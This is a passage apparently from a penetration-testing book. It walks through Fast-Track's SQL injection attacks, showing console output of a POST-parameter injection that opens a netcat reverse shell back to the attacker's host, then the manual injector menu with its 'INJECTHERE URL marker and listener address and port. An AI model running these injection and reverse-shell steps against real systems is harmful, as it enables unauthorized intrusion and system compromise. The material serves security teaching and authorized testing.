Fast-Track
167
Sending payload to parameter: txtLogin
Sending payload to parameter: txtPassword
[-] The PAYLOAD is being delivered. This can take up to two minutes. [-]
listening on [any] 4444 ...
connect to [10.211.55.130] from (UNKNOWN) [10.211.55.128] 1041
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>
As you can see, Fast-Track handled the automatic detection of the POST
parameters and injected the attack, completely compromising the affected
system via SQL injection.
NOTE
You can also use FTP to deliver your payload, although FTP is generally blocked on
outbound-based connections.
Manual Injection
If you have a different IP address listening for the reverse shell or you need
to fine-tune some of the configuration settings, you can set up the injector
manually.
Enter which SQL Injector you want to use
1. SQL Injector - Query String Parameter Attack
2. SQL Injector - POST Parameter Attack
3. SQL Injector - GET FTP Payload Attack
4. SQL Injector - GET Manual Setup Binary Payload Attack
Enter your choice:
4
The manual portion allows you to customize your attack for whatever reason.
You will need to designate where in the URL the SQL Injection is by using
'INJECTHERE
So for example, when the tool asks you for the SQL Injectable URL, type:
http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah
Enter the URL of the susceptible site, remember to put 'INJECTHERE for the
injectible parameter
Example: http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah
Enter here:
http://www.secmaniac.com/index.asp?id=
'
INJECTHERE&date=2010
Enter the IP Address of server with NetCat Listening:
10.211.55.130
Enter Port number with NetCat listening:
9090